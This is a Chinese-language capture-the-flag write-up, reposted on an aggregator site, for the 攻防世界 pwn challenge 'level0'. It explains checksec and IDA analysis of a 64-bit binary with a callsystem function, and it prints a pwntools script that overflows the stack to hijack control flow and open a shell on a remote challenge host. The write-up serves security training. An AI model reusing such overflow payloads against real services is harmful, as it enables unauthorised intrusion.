攻防世界—pwn—level0

Posted anweilx

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了攻防世界—pwn—level0相关的知识,希望对你有一定的参考价值。

题目分析

下载文件后首先使用checksec检查文件保护机制

文件名太长了,就更改了一下

技术图片

发现是一个64位程序,使用ida查看伪代码

技术图片

注意到一个特殊的函数名callsystem

技术图片

确定思路,直接栈溢出

信息收集

确定偏移量

技术图片

/bin/sh地址

方法1

技术图片

方法2

技术图片

编写脚本

from pwn import *

p = remote(‘111.198.29.45‘,32366)
#p = process("./pwn001")
system = 0x400596
payload = "A"*0x80+"b"*8+p64(system)
p.sendlineafter("Hello, World",payload)
p.interactive()

本地测试

技术图片

靶机测试

技术图片
技术图片


以上是关于攻防世界—pwn—level0的主要内容,如果未能解决你的问题,请参考以下文章

攻防世界—pwn—hello_pwn

攻防世界—pwn—level2

pwn攻防世界 pwn新手区wp

攻防世界pwn之新手练习区

攻防世界PWN题 string

CTF PWN-攻防世界XCTF新手区WriteUp